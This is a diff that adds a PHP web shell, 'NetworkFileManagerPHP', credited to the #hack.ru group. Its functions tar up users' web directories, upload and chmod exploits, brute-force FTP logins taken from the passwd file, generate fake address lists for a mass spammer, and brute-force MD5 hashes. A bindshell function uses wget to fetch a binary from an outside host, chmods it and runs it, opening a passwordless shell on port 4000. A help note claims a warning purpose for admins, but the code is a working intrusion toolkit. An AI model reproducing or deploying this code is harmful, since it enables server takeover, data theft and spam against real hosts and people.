+ <tr><td> <font color='#FFFFCC' face='Tahoma' size = 2>Directory <u><b>$fullpath</b></u>  ".exec("tar -zc $fullpath -f $pass.tar.gz")."was compressed to file <u>$pass.tar.gz</u></font></center></td></tr></table>";
+
+
+
+}
+
+
+
+function down($dir) {
+
+ global $action,$status, $tm,$PHP_SELF,$HTTP_HOST, $file3, $file2;
+
+ ignore_user_abort(1);
+
+ set_time_limit(0);
+
+echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>File upload</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><blockquote>There are many cases, when host, where <b>NFM</b> is situated <b>WGET</b> is blocked. And you may need to upload files anyway. So here you can do it without wget, upload file to path where the NFM is, or to any path you enter (see<b>Path</b>).(this works not everywhere)</blockquote></td></tr>
+
+</table>";
+
+
+
+if (!isset($status)) downfiles();
+
+
+
+else
+
+{
+
+
+
+$data = @implode("", file($file3));
+
+$fp = @fopen($file2, "wb");
+
+@fputs($fp, $data);
+
+$ok = @fclose($fp);
+
+if($ok)
+
+{
+
+$size = filesize($file2)/1024;
+
+$sizef = sprintf("%.2f", $size);
+
+
+
+print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>You have uploaded: <b>file <u>$file2</u> with size</b> (".$sizef."kb) </font></center></td></tr></table>";
+
+}
+
+else
+
+{
+
+print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0BAACC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2><b>Error during file upload</b></font></center></td></tr></table>";
+
+}
+
+}
+
+}
+
+
+
+# mail function
+
+function mailsystem() {
+
+ global $status,$form,$action,$name,$email,$pole,$REMOTE_ADDR,$HTTP_REFERER,$DOCUMENT_ROOT,$PATH_TRANSLATED,$HTTP_HOST;
+
+
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Questions and wishes for NetworkFileManagerPHP</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br>
+
+<blockquote>During your work with script <b>NetworkFileManagerPHP</b> you may want to ask some quetions, or advice author to add some functions, which are not supported yet. Write them here, and your request will be sattisfied.
+
+</blockquote></td></tr>
+
+</table>";
+
+
+
+ if (!isset($status)) echo "$form";
+
+ else {
+
+  $email_to ="duyt@yandex.ru";
+
+  $subject = "NetworkFileManagerPHP  ($name)";
+
+  $headers = "From: $email";
+
+
+
+  $info = "---==== Message from ($name)====---\n\n";
+
+  $info .= "Name:\t$name\n";
+
+  $info .= "Email:\t$email\n";
+
+  $info .= "What?:\n\t$pole\n\n";
+
+  $info .= "IP:\t$REMOTE_ADDR\n";
+
+  $info .= "HOST:\t$HTTP_HOST\n";
+
+  $info .= "URL:\t$HTTP_REFERER\n";
+
+  $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
+
+  $send_to = "$email_to";
+
+
+
+  $send = mail($send_to, $subject, $info, $headers);
+
+  if($send == 2) echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Thank you!!!Your e-mail was sent successfully.</font></center></td></tr></table><br>";
+
+ }
+
+}
+
+function spam() {
+global $chislo, $status, $from, $otvet, $wait, $subject, $body, $file, $check_box, $domen;
+set_time_limit(0);
+ignore_user_abort(1);
+echo "<br>
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Real uniq spamer</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br><blockquote> Now, using this release of NFM you don't need to by spambases, because it will generate spambases by itself, with 50-60% valids. </blockquote></td></tr>
+</table>";
+
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form action='$PHP_SELF?action=spam' method=post>
+ <tr><td align=left valign=top colspan=4 class=pagetitle>
+ &nbsp;&nbsp;<b>email generator:</b></td></tr>
+ <tr> <tr><td align=left valign=top colspan=4 bgcolor=#FFFFCC width=500>
+ &nbsp;&nbsp;This spammer is splited in two parts: <br>
+ &nbsp;<b>1.</b> email generation with domains, included in script already, or email e-mail generation for domains was entered by you. Here choose how much accounts do you wish to use ( the advice is to generate about &lt;u><i>10 000 , because may be server heavy overload</i></u> )<br>
+ &nbsp;<b>2.</b> Type spam settings here</td></tr>
+ <td align=left colspan=2 class=pagetitle>&nbsp;&nbsp;<input type='checkbox' name='check_box[]'>&nbsp;&nbsp;if <b>checked</b> then you'll have default domains, if not <b>checked</b> then domain will be taken from input.</td></tr>
+<tr><td align=center class=pagetitle width=200>&nbsp;&nbsp;Generated email quantity:</td>
+<td align=left colspan=2>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='chislo' size=10>&nbsp;&nbsp;</td></tr>
+<tr><td align=center class=pagetitle width=200>&nbsp;Your domain:</td>
+<td align=left width=200>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='domen[]'>&nbsp;&nbsp;</td>
+</tr>
+<tr><td width=500 align=center colspan=2><input type='submit' value='Generate' class=button1 $style_button>
+</td></tr>
+
+ </form></table>";
+// letters
+function s() {
+   $word="qwrtpsdfghklzxcvbnm";
+   return $word[mt_rand(0,strlen($word)-1)];
+}
+// letters
+function g() {
+   $word="eyuioa";
+   return $word[mt_rand(0,strlen($word)-2)];
+}
+// digits
+function c() {
+   $word="1234567890";
+   return $word[mt_rand(0,strlen($word)-3)];
+}
+// common
+function a() {
+   $word=array('wa','sa','da','qa','ra','ta','pa','fa','ga','ha','ja','ka','la','za','xa','ca','va','ba','na','ma');
+   $ab1=count($word);
+   return $wq=$word[mt_rand(0,$ab1-1)];
+}
+
+function o() {
+   $word=array('wo','so','do','qo','ro','to','po','fo','go','ho','jo','ko','lo','zo','xo','co','vo','bo','no','mo');
+   $ab2=count($word);
+   return $wq2=$word[mt_rand(0,$ab2-1)];
+}
+function e() {
+   $word=array('we','se','de','qe','re','te','pe','fe','ge','he','je','ke','le','ze','xe','ce','ve','be','ne','me');
+   $ab3=count($word);
+   return $wq3=$word[mt_rand(0,$ab3-1)];
+}
+
+function i() {
+   $word=array('wi','si','di','qi','ri','ti','pi','fi','gi','hi','ji','ki','li','zi','xi','ci','vi','bi','ni','mi');
+   $ab4=count($word);
+   return $wq4=$word[mt_rand(0,$ab4-1)];
+}
+function u() {
+   $word=array('wu','su','du','qu','ru','tu','pu','fu','gu','hu','ju','ku','lu','zu','xu','cu','vu','bu','nu','mu');
+   $ab5=count($word);
+   return $wq5=$word[mt_rand(0,$ab5-1)];
+}
+
+function name0() {   return c().c().c().c();                    }
+function name1() {   return a().s();        }
+function name2() {   return o().s();        }
+function name3() {   return e().s();        }
+function name4() {   return i().s();        }
+function name5() {   return u().s();        }
+function name6() {   return a().s().g();        }
+function name7() {   return o().s().g();        }
+function name8() {   return e().s().g();        }
+function name9() {   return i().s().g();        }
+function name10() {   return u().s().g();        }
+function name11() {   return a().s().g().s();        }
+function name12() {   return o().s().g().s();        }
+function name13() {   return e().s().g().s();        }
+function name14() {   return i().s().g().s();        }
+function name15() {   return u().s().g().s();        }
+
+
+$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
+$domain1=array('mail.ru','hotmail.com','aol.com','yandex.ru','rambler.ru','bk.ru','pochta.ru','mail333.com','yahoo.com','lycos.com','eartlink.com');
+$d1c=count($domain1);
+
+function randword() {
+   global $cool,$cool2;
+   $func="name".mt_rand(0,15);
+   $func2="name".mt_rand(0,15);
+   switch (mt_rand(0,2)) {
+      case 0: return $func().$func2();
+      case 1: return $func().$cool[mt_rand(0,count($cool)-9)];
+	  case 2: return $func();
+      default: return $func();
+   }
+ }
+
+if (@unlink("email.txt") < 0){
+echo "�����";
+exit;
+}
+$file="email.txt";
+
+
+if($chislo){
+
+
+ $cnt3=mt_rand($chislo,$chislo);
+   for ($i=0; $i<$cnt3; $i++) {
+   $u=randword();
+  if(!isset($check_box)){
+
+  if ( IsSet($_POST["domen"]) && sizeof($_POST["domen"]) > 0 )
+{
+   $domen = $_POST["domen"];
+      foreach( $domen as $k=>$v )
+   {
+       $d=$domen[mt_rand(0,$v-1)];
+
+   }
+}
+$f=@fopen(email.".txt","a+");
+   fputs($f,"$u@$d\n");
+   }else{
+
+   $d=$domain1[mt_rand(0,$d1c-1)];
+   $f=@fopen(email.".txt","a+");
+   fputs($f,"$u@$d\n");
+   }
+
+  }
+   $address = $file;
+  if (@file_exists($address)) {
+    if($changefile = @fopen ($address, "r")) {
+      $success = 1;
+    } else  {
+    echo " File not found <b>\"".$address."\"</b> !<br>";
+  }
+
+   if ($success == 1) {
+   echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>";
+    echo "<tr><td align=center class=pagetitle width=500>  ���������� ����� <b>$chislo</b> email.</td></tr>";
+	echo "<tr><td align=center> ";
+    echo "<textarea name=\"email\" rows=\"13\" cols=\"58\" class=inputbox>";
+    while($line = @fgets($changefile,1024)) {
+      echo @trim(stripslashes($line))."\n";
+    }
+    echo"</textarea></td></tr></table>";
+	}
+	}
+	
+if (!isset($action)){
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form action='$PHP_SELF?action=spam1&status=ok' method=post enctype='multipart/form-data'>
+ <tr><td align=center class=pagetitle colspan=2><b>Main spammer settings</b></font></b></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;reply to:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='from' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;send to:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='otvet' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Delay (sec):</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='wait' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;message topic:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='subject' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;message body:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<textarea name='body' rows='13' cols='60' class=inputbox> </textarea></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;File:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='file' name='file' size=30></td></tr>
+<tr><td width=500 align=center colspan=2>
+<input type='submit' value='Generate' class=button1 $style_button >
+<INPUT TYPE='hidden' NAME='$chislo'>
+</td></tr>
+ </form></table>";
+}
+}
+}
+
+function spam1() {
+ global $status, $from, $otvet, $wait, $subject, $body, $file, $chislo;
+ set_time_limit(0);
+ignore_user_abort(1);
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Send spam with current settings</b></font></b></td></tr>
+</table>";
+
+
+ error_reporting(63); if($from=="") { print
+"<script>history.back(-1);alert('missing field : <send from>')</script>";exit;}
+ error_reporting(63); if($otvet=="") { print
+"<script>history.back(-1);alert('missing field: <reply to>')</script>";exit;}
+ error_reporting(63); if($wait=="") { print
+"<script>history.back(-1);alert('missing field: <send delay>')</script>";exit;}
+ error_reporting(63); if($subject=="") { print
+"<script>history.back(-1);alert('missing field: <message topic>')</script>";exit;}
+ error_reporting(63); if($body=="") { print
+"<script>history.back(-1);alert('missing field: <message body>')</script>";exit;}
+
+  $address = "email.txt";
+  $counter = 0;
+ if (!isset($status)) echo "something goes wrong, check your settings";
+ else {
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <tr><td align=center bgcolor=#FFFFCC>opening file <b>\"".$address."\"</b> ...<br></td></tr>
+";
+  if (@file_exists($address)) {
+ echo "
+  <tr><td align=center bgcolor=#FFFFCC>File <b>\"".$address."\"</b> was found...<br></td></tr>
+";
+    if($afile = @fopen ($address, "r")) {
+ echo "
+ <tr><td align=center bgcolor=#FFFFCC>File <b>\"".$address."\"</b> was opened for read...<br></td></tr>
+";
+    } else {
+ echo "
+ <tr><td align=center class=pagetitle>Unable to open  <b>\"".$address."\"</b> for read...<br></td></tr>
+";
+    }
+  } else {
+    echo "There is no file <b>\"".$address."\"</b> !<br>";
+    $status = "unable to find file \"".$address."\" ...";
+  }
+ echo "
+ <tr><td align=center bgcolor=#FFFFCC>Begining read from file <b>\"".$address."\"</b> ...<br></td></tr>
+ </table>";
+  if (@file_exists($address)) {
+
+    while (!feof($afile)) {
+
+      $line = fgets($afile, 1024);
+      $line = trim($line);
+      $recipient = "";
+      $recipient = $line;
+
+#if ($file) {
+#	$content = fread(fopen($file,"r"),filesize($file));
+#		$content = chunk_split(base64_encode($content));
+#		$name = basename($file);
+#   } else {
+#   $content ='';
+#   }
+      $boundary = uniqid("NextPart_");
+
+	  $header    = "From: ".$from."\r\n";
+	  $header   .= "Reply-To: ".$otvet."\r\n";
+	  $header   .= "Errors-To: ".$otvet."\r\n";
+      $header   .= "X-Mailer: MSOUTLOOK / ".phpversion()."\r\n";
+	  $header .= "Content-Transfer-Encoding: 8bits\n";
+      $header .= "Content-Type: text/html; charset=\"windows-1251\"\n\n";
+	  $header .= $body;
+	#  $header   .="--$boundary\nContent-type: text/html; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$content\n\n--$boundary--";
+
+
+	  $pattern="#^[-!\#$%&\"*+\\./\d=?A-Z^_|'a-z{|}~]+";
+      $pattern.="@";
+      $pattern.="[-!\#$%&\"*+\\/\d=?A-Z^_|'a-z{|}~]+\.";
+      $pattern.="[-!\#$%&\"*+\\./\d=?A-Z^_|'a-z{|}~]+$#";
+
+      if($recipient != "")
+      {
+        if(preg_match($pattern,$recipient))
+        {
+          echo "
+		  <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <tr><td align=center class=pagetitle>Sending mail to <b>\"".$recipient."\"</b>...sent ";
+
+
+            if(@mail($recipient, stripslashes($subject), stripslashes($header))) {
+              $counter = $counter + 1;
+              echo "<b>[\"".$counter."\"]</b> ".date("H:i:s")."</td></tr> </table>";
+            } else {
+              echo "<tr><td align=center class=pagetitle>email is wrong, message was NOT sent !</td></tr> </table>";
+            }
+          } else {
+              $counter = $counter + 1;
+              echo "";
+          }
+        } else {
+           echo "<br>";
+        }
+      $sec = $wait * 1000000;
+      usleep($sec);
+
+    }
+
+    if($otvet != "")
+    {
+
+      if(preg_match($pattern,$otvet))
+      {
+		echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+		  <tr><td align=center class=pagetitle>Sending test message to <b>\"".$otvet."\"</b> to check out";
+        $subject = "".$subject;
+
+        if(@mail($otvet, stripslashes($subject), stripslashes($message), stripslashes($header))) {
+          $counter = $counter + 1;
+          echo " message was sent... <b>[\"".$counter."\"]</b> ".date("H:i:s")."</td></tr> </table>";
+        } else {
+          echo "<tr><td align=center class=pagetitle>message was not sent...</td></tr> </table>";
+        }
+      } else {
+          echo "<tr><td align=center class=pagetitle>email is wrong.</td></tr> </table>";
+      }
+    } else {
+    }
+
+    if(@fclose ($afile)) {
+      echo "
+	   <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+  <tr><td align=center class=pagetitle>File <b>\"".$address."\"</b> was closed successfully!<br></td></tr> </table>";
+    } else {
+      echo "
+	   <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+  <tr><td align=center class=pagetitle>Unable to close  <b>\"".$address."\"</b> file!<br></td></tr> </table>";    }
+  } else {
+    echo "unable to read file  <b>\"".$afile."\"</b> ...<br>";
+  }
+
+     $status2 ="Status: ".$counter." messages were sent.";
+    echo "<br>";
+    echo "
+	  <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+  <tr><td align=center class=pagetitle>$status2</td></tr> </table>";
+
+}
+}
+
+
+# help
+
+function help() {
+
+ global $action,$REMOTE_ADDR,$HTTP_REFERER;
+
+ echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>help for scriptNetworkFileManagerPHP</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><b>NetworkFileManagerPHP</b> - script to access your host in a best way</font><br><br>
+
+There were added some commands to NFM, from scripts kind of itself. They are:<br>
+
+- Using aliases (<b>Rush</b>)<br>
+
+- FTP bruteforce (<b>TerraByte<b/>)<br>
+
+- Translated to english by (<b>revers<b/>)<br>
+
+- Added some sysinfo commands by (<b>revers<b/>)<br>
+
+- All the rest code belongs to me (<b>xoce<b/>)<br>
+
+- Thanks for testing goes to all #hack.ru channel<br><br>
+
+<b>Warning, we wanted to show by this script, that admins have to protect their system better, then they do now. Jokes with apache config are not good... Pay more attention to configuration of your system.</b><br><br>
+
+<b>How can you find us:</b><br>
+
+Irc server: irc.megik.net:6667 /join #hack.ru<br>
+
+See you round at network!!!<br></td></tr></table><br>";
+
+}
+
+
+
+
+
+function exploits($dir) {
+
+ global $action,$status, $file3,$file2,$tm,$PHP_SELF,$HTTP_HOST,$style_button, $public_site, $private_site, $private, $public, $title_ex, $title_exp;
+
+if (!isset($status)) upload_exploits();
+
+
+
+else
+
+{
+
+
+
+$data = implode("", file($file3));
+
+$fp = @fopen($file2, "wb");
+
+fputs($fp, $data);
+
+$ok = fclose($fp);
+
+if($ok)
+
+{
+
+$size = filesize($file2)/1024;
+
+$sizef = sprintf("%.2f", $size);
+
+print "".exec("chmod 777 $public[1]")."";
+
+print "".exec("chmod 777 $public[2]")."";
+
+print "".exec("chmod 777 $public[3]")."";
+
+print "".exec("chmod 777 $private[1]")."";
+
+print "".exec("chmod 777 $private[2]")."";
+
+print "".exec("chmod 777 $private[3]")."";
+
+print "".exec("chmod 777 $private[4]")."";
+
+print "".exec("chmod 777 $private[5]")."";
+
+print "".exec("chmod 777 $private[6]")."";
+
+print "".exec("chmod 777 $private[7]")."";
+
+print "".exec("chmod 777 $private[8]")."";
+
+
+
+print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>You have uploaded: <b>file with size</b> (".$sizef."kb) </font></center></td></tr></table>";
+
+}
+
+else
+
+{
+
+print "Some errors occured.";
+
+}
+
+}
+
+}
+
+
+
+
+
+# FTP-bruteforce
+
+function ftp() {
+
+ global $action, $ftp_server, $filename, $HTTP_HOST;
+
+ ignore_user_abort(1);
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle>FTP server: <b>$ftp_server</b></td></tr>";
+
+
+
+ $fpip = @fopen ($filename, "r");
+
+ if ($fpip) {
+
+  while (!feof ($fpip)) {
+
+   $buf = fgets($fpip, 100);
+
+   ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
+
+   $conn_id=ftp_connect($ftp_server);
+
+   if (($conn_id) && (@ftp_login($conn_id, $g[1], $g[1]))) {
+
+
+
+   $f=@fopen($HTTP_HOST,"a+");
+
+   fputs($f,"$g[1]:$g[1]\n");
+
+     echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Connected with login:password - ".$g[1].":".$g[1]."</b></td></tr></table>";
+
+
+
+   ftp_close($conn_id);
+
+   fclose($f);
+
+   } else {
+
+    echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFCC BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center>".$g[1].":".$g[1]." - <b>failed</b></td></tr></table>";
+
+   }
+
+  }
+
+ }
+
+}
+
+
+
+function tar() {
+
+ global $action, $filename;
+
+ set_time_limit(0);
+
+ echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Data compression</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><blockquote>According to the different settings of servers, I didn't make default config of NFM. You're to write full path to the domain's folder and then press enter, so all data, containing in this folder will be compressed to tar.gz.<br><br>
+
+<b>Warning!</b><br>File <b>passwd</b> can have big size, so opening all users of this host can waste much time.<br><br>
+
+<b>It's highly recommended!</b><br>Open current function in another window of browser, to compress information, which you're interested in, during your host exploring.</blockquote></td></tr>
+
+</table><br>";
+
+
+
+$http_public="/public_html/";
+
+$fpip = @fopen ($filename, "r");
+
+if ($fpip) {
+
+ while (!feof ($fpip)) {
+
+  $buf = fgets($fpip, 100);
+
+  ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
+
+  $name=$g[1];
+
+  echo "
+
+<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<form method='get' action='$PHP_SELF' >
+
+<tr><td align=center colspan=2 class=pagetitle><b>Compression <u>$name.tar.gz</u>:</b></td></tr>
+
+<tr>
+
+<td valign=top><input type=text name=cm size=90 class='inputbox'value='tar -zc /home/$name$http_public -f $name.tar.gz' ></td>
+
+<td valign=top><input type=submit value='GO' class=button1 $style_button></td>
+
+</tr></form></table>";
+
+  }
+
+ }
+
+}
+
+
+
+# bindshell
+
+function bash() {
+
+ global $action, $port_bind, $pass_key;
+
+
+
+echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Binding shell</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br>Current shell binds 4000 port, you may access to it by telneting to host:4000 port without password.</td></tr>
+
+</table><br>";
+
+
+
+echo "
+
+<TABLE CELLPADDING=0 CELLSPACING=0 width='500' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b> Bindshell binary is situated in file called<u><i>s</i></u></b></td></tr>";
+
+
+
+echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("wget http://hackru.info/adm/exploits/bash/s")."</b> Downloading...</td></tr>";
+
+echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("chmod 777 s")."</b> now chmod to 777</td></tr>";
+
+echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("./s")."</b> now running to 4000 port</td></tr>";
+
+# echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("rm -f s")."</b> Removing file<u>s</u> now...</td></tr>";
+
+echo"</table>";
+
+
+
+ }
+
+
+
+function crypte() {
+
+ global $action,$md5a,$sha1a,$crc32, $key,$string;
+
+echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Data crypter</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><blockquote>Now there are many different programs and scripts, which uses a lot of passwords crypt methods (Do you remember what a phpBB is?=)), so with NFM you can crypt some strings to hashes, because sometimes you may need to change somebodyes data with your one =). Also you may change your pass to NFM here.</blockquote></td></tr>
+
+</table>";
+
+
+
+echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post>
+
+ <tr><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Here are some useful cryption methods, which uses MHASH lib:</b></td></tr>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>MD5 </b>(Very popular and fast method)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400>&nbsp;Result:&nbsp;&nbsp;<font color=#ffffcc><b>".md5($md5a)."</b></font></td>
+
+ <td class=pagetitle width=100>&nbsp;Input:&nbsp;<font color=red><b>".$md5a."</b></font></td></tr>
+
+ <tr><td align=center width=400><input class='inputbox'type='text' name='md5a' size='50' value='' id='md5a'></td>
+
+ <td align=center width=100><input type='submit' value='Crypt MD5' class=button1 $style_button></td></tr>
+
+
+
+ </form></table>";
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post>
+
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>SHA1 </b>(SHA1 - method to crypt with open key, It's very usefull too)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400>&nbsp;Result:&nbsp;&nbsp;<font color=#ffffcc><b>".sha1($sha1a)."</b></font></td>
+
+ <td class=pagetitle width=100>&nbsp;Input:&nbsp;<font color=red><b>".$sha1a."</b></font></td></tr>
+
+ <tr><td align=center width=400><input class='inputbox' type='text' name='sha1a' size='50' value='' id='sha1a'>
+
+ </td><td align=center width=100><input type='submit' value='Crypt SHA1' class=button1 $style_button></td></tr>
+
+
+
+ </form></table>";
+
+echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post>
+
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>
+
+ &nbsp;&nbsp;<b>CRC32 </b>(Most used when making CRC check of data, but you can find a host with forum, with passwords, crypted by CRC32)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400>&nbsp;Result:&nbsp;&nbsp;<font color=#ffffcc><b>".crc32($crc32)."</b></font></td>
+
+ <td class=pagetitle width=100>&nbsp;Input:&nbsp;<font color=red><b>".$crc32."</b></font></td></tr>
+
+ <tr><td align=center width=400><input class='inputbox' type='text' name='crc32' size='50' value='' id='crc32'></td><td width=100 align=center><input type='submit' value='Crypt CRC32' class=button1 $style_button></td></tr>
+
+
+
+ </form></table>";
+
+
+
+ }
+
+
+
+function decrypte() {
+
+ global $action,$pass_de,$chars_de,$dat,$date;
+
+set_time_limit(0);
+
+ignore_user_abort(1);
+
+
+
+echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Data decrypter</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><blockquote>It's known all over the world, that MD5 crypt algorithm has no way to decrypt it, because it uses hashes. The one and only one way to try read what the hash is - to generate some hashes and then to compare them with source hash needed to be decrypted ... So this is bruteforce.</blockquote></td></tr>
+
+</table>";
+
+
+
+if($chars_de==""){$chars_de="";}
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form action='$PHP_SELF?action=decrypte' method=post name=hackru><tr><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Data decrypter:</b></td></tr>
+
